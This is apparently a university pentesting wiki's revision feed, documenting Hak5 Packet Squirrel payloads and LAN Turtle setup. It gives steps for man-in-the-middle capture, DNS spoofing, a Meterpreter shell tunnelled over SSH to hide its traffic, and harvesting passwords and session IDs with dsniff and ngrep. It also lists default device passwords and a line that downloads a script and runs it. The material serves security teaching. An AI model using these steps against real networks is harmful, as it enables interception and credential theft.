specifies which network mode Packet Sqirrel uses and how traffic is routed&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! Command !! Description&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE BRIDGE || Creates a bridge between the IN and OUT ehternet interface, with an own IP address for Packet Sqirrel&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE TRANSPARENT || Also creates a bridge between the interfaces but with no own IP address&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE NAT || Packet Squirrel gets an IP address from the target network, the client gets an IP from Packet Squirrel&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE VPN || same es NAT with VPN interface for client tunneling&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE CLONE || Clones the MAC address from the target client and uses it to connect to the LAN&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* LED&lt;br /&gt;
with this command the multi-color LED can be controlled &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! Possible configurations !! Description&lt;br /&gt;
|-&lt;br /&gt;
| LED Colors || red, green, blue, yellow, cyan, magenta, white&lt;br /&gt;
|-&lt;br /&gt;
| LED Patterns || SOLID, SLOW, FAST, SINGLE, DOUBLE, TRIPLE, SUCCESS, 1-10000&lt;br /&gt;
|-&lt;br /&gt;
| LED State || SETUP, FAIL, ATTACK, STAGE, SPECIAL, CLEANUP, FINISH&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* BUTTON&lt;br /&gt;
The BUTTON command pauses the paylpoad until the hardware button is pressed or a specified time has passed&lt;br /&gt;
&lt;br /&gt;
* SWITCH&lt;br /&gt;
The SWITCH command returns the current position of the hardware payload selection switch. Output is &amp;quot;switch1&amp;quot;, &amp;quot;switch2&amp;quot;, &amp;quot;switch3&amp;quot; or &amp;quot;switch4&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
==== Example ====&lt;br /&gt;
[[File:Hak5 C2 start.jpg |thumb|right|400px||C2 server start]]&lt;br /&gt;
[[File:Hak5 c2 dashboard.jpg |thumb|right|400px||C2 Dashboard]]&lt;br /&gt;
[[File:Hak5 c2 sqirrel.jpg |thumb|right|400px||C2 Packet Squirrel]]&lt;br /&gt;
&lt;br /&gt;
Here is an example for the usage of Squirrel Script.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# Title: Caternet&lt;br /&gt;
# Author: Hak5Darren&lt;br /&gt;
# Version: 1.0&lt;br /&gt;
# Description: Forwards all traffic to local webserver hosting cat photos.&lt;br /&gt;
# Props: In loving memory of Hak5Kerby&lt;br /&gt;
&lt;br /&gt;
LED SETUP&lt;br /&gt;
NETMODE NAT&lt;br /&gt;
echo &amp;quot;address=/#/172.16.32.1&amp;quot; &amp;gt; /tmp/dnsmasq.address&lt;br /&gt;
/etc/init.d/dnsmasq restart&lt;br /&gt;
&lt;br /&gt;
LED ATTACK&lt;br /&gt;
iptables -A PREROUTING -t nat -i eth0 -p udp --dport 53 -j REDIRECT --to-port 53&lt;br /&gt;
python -m SimpleHTTPServer 80&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
For more information go to the [https://docs.hak5.org/hc/en-us/sections/360002180414-Payload-Development hak5.org webpage].&lt;br /&gt;
&lt;br /&gt;
== with Cloud C2 ==&lt;br /&gt;
&lt;br /&gt;
The [[Hak5 Cloud C2]] is a command and control server for Hak5 devices. Installation and startup is shown in figure &amp;quot;C2 server start&amp;quot;. By browsing to the configured address you can login to the dashboard, shown in figure &amp;quot;C2 dashboard&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
To connect the Packet Squirrel with your C2 Cloud, click on the plus button in the lower right corner and choose the device. On the dashboard, open the added device and click on Setup, as shown in figure &amp;quot;C2 Packet Sqirrel&amp;quot;. Then copy the downloaded file to the Packet Squirrel&#039;s /etc folder and reboot it. &lt;br /&gt;
In the Overview tab you can also Edit, Reboot, Wipe and Remove your device. &lt;br /&gt;
&lt;br /&gt;
In the Clients tab you can see all clients which were connected to your Packet Squirrel with hostname, MAC and IP address. In the Loot tab, you can open the current loot from your Packet Squirrel directly on your C2 server. And in the Terminal tab you can open a ssh session to your device.&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
[[Packet Squirrel]]&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://docs.hak5.org/hc/en-us/categories/360000982574-Packet-Squirrel&lt;br /&gt;
* https://docs.hak5.org/hc/en-us/categories/360001177114-Cloud-C2&lt;br /&gt;
* https://downloads.hak5.org/&lt;br /&gt;
&lt;br /&gt;
[[Category:Pentesting]]&lt;/div&gt;</summary>
		<author><name>Bnagl</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=File:Packet_squirrel_ispyintel.PNG&amp;diff=6093</id>
		<title>File:Packet squirrel ispyintel.PNG</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=File:Packet_squirrel_ispyintel.PNG&amp;diff=6093"/>
		<updated>2021-03-09T15:22:22Z</updated>

		<summary type="html">&lt;p&gt;Bnagl: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Bnagl</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Hak5_Packet_Squirrel&amp;diff=6092</id>
		<title>Hak5 Packet Squirrel</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Hak5_Packet_Squirrel&amp;diff=6092"/>
		<updated>2021-03-09T14:34:50Z</updated>

		<summary type="html">&lt;p&gt;Bnagl: /* Meterpreter-via-SSH */ added picture of payload settings&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
[[File:Packet Squirrel Connectors.jpg |thumb|right|400px||Packet Squirrel device]]&lt;br /&gt;
&lt;br /&gt;
The Packet Squirrel operates as an Ethernet Man in the Middle and comes  preloaded with three exploit scripts. These three attack modes are Logging Network Traffic, Spoofing DNS and OpenVPN Tunnel. These can also be modified and exchanged with other scripts. &lt;br /&gt;
The Packet Squirrel can also be combined with the [[Hak5 Cloud C2]], a command and control server specially for Hak5 devices.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
[[File:Hak5_Squirrel_version.jpg|thumb|right|400px||SSH connect]]&lt;br /&gt;
[[File:Hak5_Squirrel_spoofhost.jpg|thumb|right|400px||spoofhost file]]&lt;br /&gt;
[[File:Hak5_Squirrel_browser.jpg|thumb|right|400px||Spoofed browser warning]]&lt;br /&gt;
&lt;br /&gt;
The Packet Squirrel has an switch to choose between the three exploit payloads for logging the TCP dump, Using VPN Tunnelling and for DNS spoofing, or Arming Mode.&lt;br /&gt;
 &lt;br /&gt;
In &#039;&#039;&#039;Arming Mode&#039;&#039;&#039; (switch in 4th position, nearest to the USB port) you can easily access the device with ssh &amp;lt;code&amp;gt;root@172.16.32.1&amp;lt;/code&amp;gt; with the password &amp;lt;code&amp;gt;hak5squirrel&amp;lt;/code&amp;gt;. Therefore Packet Squirrel acts as DHCP server. If you don&#039;t get an IP address, manually configure an IP from the 172.16.32.0/24 network on your ethernet interface. Arming Mode is indicated by a blue blinking LED an allows to configure the different payloads.&lt;br /&gt;
&lt;br /&gt;
It is also possible to gain ssh access to the device during the attack modes with the IP address of the outgiong Ethernet interface as well.    &lt;br /&gt;
&lt;br /&gt;
==== Basic Cable Setup ====&lt;br /&gt;
&lt;br /&gt;
# Plug the victims Ethernet cable into the &amp;quot;Ethernet In&amp;quot; Port&lt;br /&gt;
# Plug the gateway Ethernet cable  into the &amp;quot;Ethernet Out&amp;quot; Port&lt;br /&gt;
# Power the device by plugging in the power cable&lt;br /&gt;
&lt;br /&gt;
==== Firmware Upgrade ====&lt;br /&gt;
&lt;br /&gt;
Shiped devices are installed with version 1.0, which can be seen in the VERSION file in the Packet Squirrel root folder. The current version 3.2 can be downloaded from the Hak5 website.&lt;br /&gt;
&lt;br /&gt;
The file has to be named upgrade-version.bin (where version stands for the version number) and copied to the root directory of an NTFS or EXT4 formatted USB drive.&lt;br /&gt;
&lt;br /&gt;
Plug in the USB drive in the Packet Squirrel and set the select switch to Arming Mode. Then power on the Packet Squirrel. &lt;br /&gt;
&lt;br /&gt;
The upgrade process needs 5 minutes and is indicated by a solid red or blue LED light. When the firmware upgrade is finished, Packet Squirrel reboots and goes in Arming Mode. Shown by a blud blinking LED. &lt;br /&gt;
&lt;br /&gt;
Then you can connect again with SSH and verify the new version, shown in Figure &amp;quot;SSH connect&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
== Payloads ==&lt;br /&gt;
&lt;br /&gt;
=== Logging Network Traffic ===&lt;br /&gt;
&lt;br /&gt;
This mode creates TCP/UDP dumps and saves them on the USB drive to analyse later on.&lt;br /&gt;
Just follow these easy steps:&lt;br /&gt;
&lt;br /&gt;
# A USB Stick with an NTFS file system needs to be plugged in the USB-A Port before the Squirrel is Powered up. &lt;br /&gt;
# Flip the first position (which is nearest to the micro USB power in).&lt;br /&gt;
# Connect the Ethernet cable of the victim into the Ethernet port, which is at the same side as the power in USB connector and Connect the Gateway Ethernet cable to the other Port.&lt;br /&gt;
# Plug the power cable in and wait the one minute long start up sequence. The device can be either powered by the victim machine or by an USB power bank.&lt;br /&gt;
# The data traffic will be captured, if the LED starts blinking Yellow. If otherwise the LED circles between red, green and blue, then the USB stick has the wrong file system.&lt;br /&gt;
# Stop the capturing process by pressing the Button. Then the device takes some seconds to write the tcpdum to the USB Storage. As soon as the LED glows red the saving process has ended and you are good to go.&lt;br /&gt;
# You can now analyse the captured pcap file, located in \loot\tcpdump with [[Wireshark]].&lt;br /&gt;
&lt;br /&gt;
After that, the connection trough the Packet Squirrel is shut down. To allow the client to connect to the network again, Packet Squirrel has to be rebooted.&lt;br /&gt;
&lt;br /&gt;
=== DNS Spoofing Mode ===&lt;br /&gt;
&lt;br /&gt;
This mode spoofs the client with DNS entries to redirect traffic to other IP addresses.&lt;br /&gt;
&lt;br /&gt;
# For this mode we have to start in arming mode (switch at fourth position)&lt;br /&gt;
# After gaining access with ssh we change to the DNS spoofing directory with &amp;lt;code&amp;gt;cd /payloads/switch2&amp;lt;/code&amp;gt;.&lt;br /&gt;
# There we can define the Spoofed domain names by editing the file spoofhost with &amp;lt;code&amp;gt;nano spoofhost&amp;lt;/code&amp;gt;.&lt;br /&gt;
# In the file add entrys like &amp;lt;code&amp;gt;address=/myspoofdomain.at/194.232.104.140&amp;lt;/code&amp;gt; as shown in figure &amp;quot;spoofhost file&amp;quot;. The example IP belongs to orf.at&lt;br /&gt;
# Unplug the Packet Squirrel and shift the switch to the second position.&lt;br /&gt;
# Plug it in and wait until the startup sequence is finished and the LED starts blinking yellow.&lt;br /&gt;
&lt;br /&gt;
By browsing to the spoofed domain, the request gets redirected to the given IP. As shown in figure &amp;quot;Spoofed browser warning&amp;quot; browsers show certificate alerts because the domain and certificate do not match. But this mode can still be used to attack other applications which use domains with no validation.&lt;br /&gt;
&lt;br /&gt;
=== OpenVPN Mode ===&lt;br /&gt;
[[File:Packet Squirrel VPN1.jpg |thumb|right|400px||OpenVPN Access Mode]]&lt;br /&gt;
[[File:Packet Squirrel VPN2.jpg |thumb|right|400px||OpenVPN Tunneling Mode]]&lt;br /&gt;
&lt;br /&gt;
The VPN payload implements VPN access mode and VPN tunnelling mode. &lt;br /&gt;
If you want to Setup your own OpenVPN (OVPN) server follow the instructions at the [https://docs.hak5.org/hc/en-us/articles/360010554013-OpenVPN-Payload hak5 webpage]. For the purpose of testing we use use an existing server from [https://www.freeopenvpn.org/en/ freeopenvpn.org]. &lt;br /&gt;
# Start by selecting the desired server and download the the OVPN access certificate.&lt;br /&gt;
# Set the Packet Squirrel in Arming Mode and connect to its shell&lt;br /&gt;
# Copy the certificate with &amp;lt;code&amp;gt;scp user@server:downloadfolder/filename.ovpn /root/payloads/switch3/config.ovpn&amp;lt;/code&amp;gt;&lt;br /&gt;
# Steer to the directory with &amp;lt;code&amp;gt; cd /root/payloads/switch3/&amp;lt;/code&amp;gt;&lt;br /&gt;
# Edit the config.ovpn at line 30 to &amp;lt;code&amp;gt;auth-user-pass credentials.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
# Add an credentials file with  &amp;lt;code&amp;gt; nano credentials.txt&amp;lt;/code&amp;gt; and add the two lines:&lt;br /&gt;
## &amp;lt;code&amp;gt;freeopenvpn&amp;lt;/code&amp;gt; &lt;br /&gt;
## &amp;lt;code&amp;gt;&amp;lt;the displayed password&amp;gt;&amp;lt;/code&amp;gt; &lt;br /&gt;
# Before starting the VPN we choose the VPN mode:&lt;br /&gt;
## Open the &amp;lt;code&amp;gt;payload.sh&amp;lt;/code&amp;gt; &lt;br /&gt;
## Set the &amp;lt;code&amp;gt;For_Clients=&amp;lt;/code&amp;gt;  to&lt;br /&gt;
### &amp;lt;code&amp;gt;0&amp;lt;/code&amp;gt; for Access Mode&lt;br /&gt;
### &amp;lt;code&amp;gt;1&amp;lt;/code&amp;gt; for Tunneling Mode&lt;br /&gt;
# Now set the Switch the the third Position and plug power out and in again&lt;br /&gt;
# You are good to go, if the yellow LED starts to flash after the boot up sequence  &lt;br /&gt;
==== Access Mode ====&lt;br /&gt;
&lt;br /&gt;
Access mode allows the squirrel to access the VPN Network via the Secure Shell&lt;br /&gt;
If the connection was established if the command &amp;lt;code&amp;gt;ifconfig tun0&amp;lt;/code&amp;gt; show the following output when it is issued at the Packet Squirrels Shell.&lt;br /&gt;
 tun0 &lt;br /&gt;
      Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00&lt;br /&gt;
      inet addr:192.168.231.245 P-t-P:192.168.231.245 Mask:255.255.255.0&lt;br /&gt;
      UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1500 Metric:1&lt;br /&gt;
      RX packets:12 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
      TX packets:8 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
      collisions:0 txqueuelen:100&lt;br /&gt;
      RX bytes:1404 (1.3 KiB) TX bytes:608 (608.0 B)&lt;br /&gt;
&lt;br /&gt;
The Access Mode can be used to access an Private network that is used for testing and pen testing purposes like an honeypot virtual machine.&lt;br /&gt;
&lt;br /&gt;
==== Tunneling Mode ====&lt;br /&gt;
&lt;br /&gt;
The Tunnelling mode encapsulates all the traffic and sends it to the VPN Server, from where it is send to the internet. VPN Tunnelling allows users to disguise their IP address you can check your current IP address with [https://www.ipchicken.com ipchicken.com].&lt;br /&gt;
&lt;br /&gt;
You can also install an simple openVPN Server on a linux machine with&lt;br /&gt;
&amp;lt;code&amp;gt;wget https://git.io/vpn -O openvpn.sh &amp;amp;&amp;amp; bash openvpn.sh&amp;lt;/code&amp;gt;&lt;br /&gt;
and press Enter 6 times.&lt;br /&gt;
Then copy the generated client.ovpn file to Packet Squirrel in the /payload/switch3 folder and restart it with the switch on third position.&lt;br /&gt;
=== Meterpreter-via-SSH ===&lt;br /&gt;
[[File:Packet squirrel meterpreter ssh.PNG |thumb|right|400px||Packet Squirrel Payload settings]]&lt;br /&gt;
This payload starts the Packet Squirrel in NAT mode and waits for user input. When the button is pressed, the payload connects to a remote SSH server and creates a local port tunnel. It then launches a meterpreter shell over the tunnel.&lt;br /&gt;
The intent is to hide the meterpreter network traffic behind a legitimate SSH activity.&lt;br /&gt;
You can download this payload from the offical [https://github.com/hak5/packetsquirrel-payloads/tree/master/payloads/library/remote-access/Meterpreter-via-SSH hak5 github].&lt;br /&gt;
==== Getting Started ====&lt;br /&gt;
Copy the playload to the Packet Squirrel into the desired switch folder. Now edit the scirpt to configure your server  options:&lt;br /&gt;
* SSH_USER - username on remote SSH server&lt;br /&gt;
* SSH_HOST - ip address of remote SSH Server&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Note:&#039;&#039;&#039; If you changed the default meterpreter port don&#039;t forget to change it on the metasploit side as well.&lt;br /&gt;
* MSF_PORT&lt;br /&gt;
&lt;br /&gt;
===== Generate SSH Key on Squirrel =====&lt;br /&gt;
Now you have to generate an ssh key-pair (just use default location and empty password) on your Packet Squirrel:&lt;br /&gt;
 root@squirrel:~# ssh-keygen&lt;br /&gt;
===== Allow Squirrel on SSH Server =====&lt;br /&gt;
Then you have to copy the contents of /root/.ssh/id_rsa.pub from Packet Squirrel to the SSH Server authorized file:&lt;br /&gt;
&lt;br /&gt;
 user@server:~# mkdir ~/.ssh&lt;br /&gt;
 user@server:~# echo &#039;paste id_rsa.pub contents inside this quote&#039; &amp;gt; ~/.ssh/authorized_keys&lt;br /&gt;
===== Run Metasploit with Resource =====&lt;br /&gt;
 msf@server:~# msfconsole -r server.rc&lt;br /&gt;
&lt;br /&gt;
==== LED Definitions ====&lt;br /&gt;
# Configure NETMODE&lt;br /&gt;
#* Solid Magenta&lt;br /&gt;
# Connect to SSH Server&lt;br /&gt;
#* SUCCESS - Blink Amber 5 Times&lt;br /&gt;
#* FAIL - Blink Red 2 Times&lt;br /&gt;
# Launch meterpreter&lt;br /&gt;
#* SUCESS - Blink Cyan 1 Time&lt;br /&gt;
#* FAIL - Blink Red 1 Time&lt;br /&gt;
&lt;br /&gt;
==== Hardening Recommendations ====&lt;br /&gt;
# Use an accout with limited privileges for SSH acces on the server.&lt;br /&gt;
# User a dedicated account for Packet Squirrel device (audit usage with SSH access logs).&lt;br /&gt;
# Disable PasswordAuthentication in sshd_config on the server.&lt;br /&gt;
&lt;br /&gt;
=== ISpyintel ===&lt;br /&gt;
This payload will automate gathering various recon data on whatever passes between it&#039;s Ethernet ports. You can download this payload from the [https://github.com/hak5/packetsquirrel-payloads/tree/master/payloads/library/sniffing/ispyintel official hak5 github].&lt;br /&gt;
&#039;&#039;&#039;Note:&#039;&#039;&#039; This payload requires a usb stick to store loot.&lt;br /&gt;
==== Setup ====&lt;br /&gt;
# Edit the config variables at the top. The main variables are:&lt;br /&gt;
## &amp;lt;code&amp;gt;lootPath=&amp;quot;/mnt/loot/intel&amp;quot;  # Path to loot&amp;lt;/code&amp;gt;&lt;br /&gt;
## &amp;lt;code&amp;gt;mode=&amp;quot;TRANSPARENT&amp;quot;          # Network mode we want to use&amp;lt;/code&amp;gt;&lt;br /&gt;
## &amp;lt;code&amp;gt;interface=&amp;quot;br-lan&amp;quot;          # Interface to listen on&amp;lt;/code&amp;gt;&lt;br /&gt;
# Copy payload.sh into the ~/payloads/switch folder you wish to deploy on.&lt;br /&gt;
# Connect into a target machine with access to the LAN.&lt;br /&gt;
# Set switch to the spot and power up.&lt;br /&gt;
# Leave, get coffee, take a nap while everything is recorded and parsed for future use.&lt;br /&gt;
# When done; hit the button. The LED will rapidly flash white to let you know it is finishing up.&lt;br /&gt;
# When all is done the LED will just go blank. It is now safe to unplug and go about your day.&lt;br /&gt;
&lt;br /&gt;
==== Tasks that are started ====&lt;br /&gt;
* tcpdump - records every packet that was send and received&lt;br /&gt;
* urlsnarf - collects all websites that were visited&lt;br /&gt;
* dsniff - attempts to acquire passwords and what not&lt;br /&gt;
* ngrep - on ports 80 and 21 with the filter for common password fields&lt;br /&gt;
* ngrep - on ports 80 and 21 with the filter for common session id fields&lt;br /&gt;
* log.txt - logs the progress of the payload for troubleshooting&lt;br /&gt;
&lt;br /&gt;
==== Clean Up ====&lt;br /&gt;
Once the button is pressed the payload will automatically parse the TCPDump log file for the following items and store the results in seperate files.&lt;br /&gt;
As this process can take some time the LED will change to a rapid white blink letting you know the button command was recieved and the payload is in the process of shutting down.&lt;br /&gt;
* ipv4found.txt Will contain a unique list of all the ipv4 which the pcap file contains&lt;br /&gt;
* maybeEmails.txt Is a very loose search for possible email addresses that came across the wire in plain text.&lt;br /&gt;
&lt;br /&gt;
=== Creating your own Payloads ===&lt;br /&gt;
&lt;br /&gt;
The Packet Squirrel allows us to create our own attack payloads by loading them to the USB stick and naming them Switch1 to Switch3.&lt;br /&gt;
It allows as to create payload in python, bash or PHP. For Python and Bash it is important to use the interpreter directive Python: &amp;lt;code&amp;gt;#!/usr/bin/python&amp;lt;/code&amp;gt;, bash: &amp;lt;code&amp;gt;#!/usr/bin/bash&amp;lt;/code&amp;gt;.&lt;br /&gt;
Bash scripts can access the following pre-installed tools:&lt;br /&gt;
openvpn, autossh, tcpdump, meterpreter-https, cron, nmap, ncat-ssl, ncat, sshfs, tcpdump and wget&lt;br /&gt;
&lt;br /&gt;
The featured Squirrel Script offers the following additional commands:&lt;br /&gt;
&lt;br /&gt;
* NETMODE&lt;br /&gt;
specifies which network mode Packet Sqirrel uses and how traffic is routed&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! Command !! Description&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE BRIDGE || Creates a bridge between the IN and OUT ehternet interface, with an own IP address for Packet Sqirrel&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE TRANSPARENT || Also creates a bridge between the interfaces but with no own IP address&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE NAT || Packet Squirrel gets an IP address from the target network, the client gets an IP from Packet Squirrel&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE VPN || same es NAT with VPN interface for client tunneling&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE CLONE || Clones the MAC address from the target client and uses it to connect to the LAN&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* LED&lt;br /&gt;
with this command the multi-color LED can be controlled &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! Possible configurations !! Description&lt;br /&gt;
|-&lt;br /&gt;
| LED Colors || red, green, blue, yellow, cyan, magenta, white&lt;br /&gt;
|-&lt;br /&gt;
| LED Patterns || SOLID, SLOW, FAST, SINGLE, DOUBLE, TRIPLE, SUCCESS, 1-10000&lt;br /&gt;
|-&lt;br /&gt;
| LED State || SETUP, FAIL, ATTACK, STAGE, SPECIAL, CLEANUP, FINISH&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* BUTTON&lt;br /&gt;
The BUTTON command pauses the paylpoad until the hardware button is pressed or a specified time has passed&lt;br /&gt;
&lt;br /&gt;
* SWITCH&lt;br /&gt;
The SWITCH command returns the current position of the hardware payload selection switch. Output is &amp;quot;switch1&amp;quot;, &amp;quot;switch2&amp;quot;, &amp;quot;switch3&amp;quot; or &amp;quot;switch4&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
==== Example ====&lt;br /&gt;
[[File:Hak5 C2 start.jpg |thumb|right|400px||C2 server start]]&lt;br /&gt;
[[File:Hak5 c2 dashboard.jpg |thumb|right|400px||C2 Dashboard]]&lt;br /&gt;
[[File:Hak5 c2 sqirrel.jpg |thumb|right|400px||C2 Packet Squirrel]]&lt;br /&gt;
&lt;br /&gt;
Here is an example for the usage of Squirrel Script.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# Title: Caternet&lt;br /&gt;
# Author: Hak5Darren&lt;br /&gt;
# Version: 1.0&lt;br /&gt;
# Description: Forwards all traffic to local webserver hosting cat photos.&lt;br /&gt;
# Props: In loving memory of Hak5Kerby&lt;br /&gt;
&lt;br /&gt;
LED SETUP&lt;br /&gt;
NETMODE NAT&lt;br /&gt;
echo &amp;quot;address=/#/172.16.32.1&amp;quot; &amp;gt; /tmp/dnsmasq.address&lt;br /&gt;
/etc/init.d/dnsmasq restart&lt;br /&gt;
&lt;br /&gt;
LED ATTACK&lt;br /&gt;
iptables -A PREROUTING -t nat -i eth0 -p udp --dport 53 -j REDIRECT --to-port 53&lt;br /&gt;
python -m SimpleHTTPServer 80&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
For more information go to the [https://docs.hak5.org/hc/en-us/sections/360002180414-Payload-Development hak5.org webpage].&lt;br /&gt;
&lt;br /&gt;
== with Cloud C2 ==&lt;br /&gt;
&lt;br /&gt;
The [[Hak5 Cloud C2]] is a command and control server for Hak5 devices. Installation and startup is shown in figure &amp;quot;C2 server start&amp;quot;. By browsing to the configured address you can login to the dashboard, shown in figure &amp;quot;C2 dashboard&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
To connect the Packet Squirrel with your C2 Cloud, click on the plus button in the lower right corner and choose the device. On the dashboard, open the added device and click on Setup, as shown in figure &amp;quot;C2 Packet Sqirrel&amp;quot;. Then copy the downloaded file to the Packet Squirrel&#039;s /etc folder and reboot it. &lt;br /&gt;
In the Overview tab you can also Edit, Reboot, Wipe and Remove your device. &lt;br /&gt;
&lt;br /&gt;
In the Clients tab you can see all clients which were connected to your Packet Squirrel with hostname, MAC and IP address. In the Loot tab, you can open the current loot from your Packet Squirrel directly on your C2 server. And in the Terminal tab you can open a ssh session to your device.&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
[[Packet Squirrel]]&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://docs.hak5.org/hc/en-us/categories/360000982574-Packet-Squirrel&lt;br /&gt;
* https://docs.hak5.org/hc/en-us/categories/360001177114-Cloud-C2&lt;br /&gt;
* https://downloads.hak5.org/&lt;br /&gt;
&lt;br /&gt;
[[Category:Pentesting]]&lt;/div&gt;</summary>
		<author><name>Bnagl</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=File:Packet_squirrel_meterpreter_ssh.PNG&amp;diff=6091</id>
		<title>File:Packet squirrel meterpreter ssh.PNG</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=File:Packet_squirrel_meterpreter_ssh.PNG&amp;diff=6091"/>
		<updated>2021-03-09T14:33:21Z</updated>

		<summary type="html">&lt;p&gt;Bnagl: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Bnagl</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Hak5_LAN_Turtle&amp;diff=6090</id>
		<title>Hak5 LAN Turtle</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Hak5_LAN_Turtle&amp;diff=6090"/>
		<updated>2021-03-05T16:28:18Z</updated>

		<summary type="html">&lt;p&gt;Bnagl: /* Use Cases */ edited reverse shell with netcat&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
[[File:LANTurtle.jpg |thumb|right|400px||LAN Turtle and Field Guide]]&lt;br /&gt;
The LAN turtle is a tool for penetration testers and system administrators disguised as a simple USB Ethernet adapter. It provides possibilities to perform remote access, man-in-the-middle and information gathering attacks. These functions are provided by the turtle modules which are preinstalled on the LAN turtle. The modules are based on the OpenWRT platform which allow users to add customized modules. The turtle itself is covert by a generic USB to Ethernet adapter and can therefore be placed unnoticed in IT infrastructures.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Setting up the LAN Turtle ===&lt;br /&gt;
&lt;br /&gt;
# Plug the LAN turtle into one of the USB ports of your computer.&lt;br /&gt;
# Your computer will get an 172.16.84.x address as soon as the startup sequence of the turtle finished. If not, then you have to statically configure an IP out of the 172.16.84.0/24 range.&lt;br /&gt;
# Connect to the turtle with &amp;lt;code&amp;gt;ssh root@172.16.84.1&amp;lt;/code&amp;gt; and enter the password &amp;lt;code&amp;gt;sh3llz&amp;lt;/code&amp;gt;&lt;br /&gt;
# The simplistic graphical shell interface will prompt you to change the password but the old one is also allowed.&lt;br /&gt;
# Then the LAN turtle can be configured and modules can be installed within the interface. &lt;br /&gt;
# If you end the interface you will be greeted with an normal Linux shell but you can open it again with the &amp;lt;code&amp;gt;turtle&amp;lt;/code&amp;gt; command&lt;br /&gt;
&lt;br /&gt;
=== Updating firmware (optional) ===&lt;br /&gt;
To ensure the best performance and compatability you should update the firmware regularly. This requires an internet conneciton.&lt;br /&gt;
&lt;br /&gt;
# Select &amp;lt;code&amp;gt;Config&amp;lt;/code&amp;gt; in the Main Menu and press select.&lt;br /&gt;
# Go to &amp;lt;code&amp;gt;Check for updates&amp;lt;/code&amp;gt; and press select to start the update process.&lt;br /&gt;
# Wait till the update finishes.&lt;br /&gt;
&lt;br /&gt;
=== Factory Reset (optional)===&lt;br /&gt;
In the extreme case that a LAN Turtle has become permanently inaccessible or inoperative, there is a quick method for recovery using a special web interface.&lt;br /&gt;
# Download the latest LAN Turtle factory image from the [https://downloads.hak5.org/ official download center]. Note: Choose the factory recovery image.&lt;br /&gt;
# Open the LAN Turtle carefully. There are 2 screws under the sticker.&lt;br /&gt;
# Now you need to find the reset button/jumper contact. You can find a video on how to locate [https://www.youtube.com/watch?v=ubNin_79wxE here].&lt;br /&gt;
# Hold down the button/jumper while you&#039;re plugging the LAN Turtle in your PC and keep holding it for 5 more seconds.&lt;br /&gt;
# Go to http://192.168.1.1 for the firmware web recovery tool and upload the image to the LAN Turtle.&lt;br /&gt;
# Wait 5-10 minutes for the recovery to finish, the LAN Turtle will indicate it with a special LED blink pattern. Watch the video for the LED Pattern to know when the recovery has finished.&lt;br /&gt;
&lt;br /&gt;
=== Using the turtle modules ===&lt;br /&gt;
&lt;br /&gt;
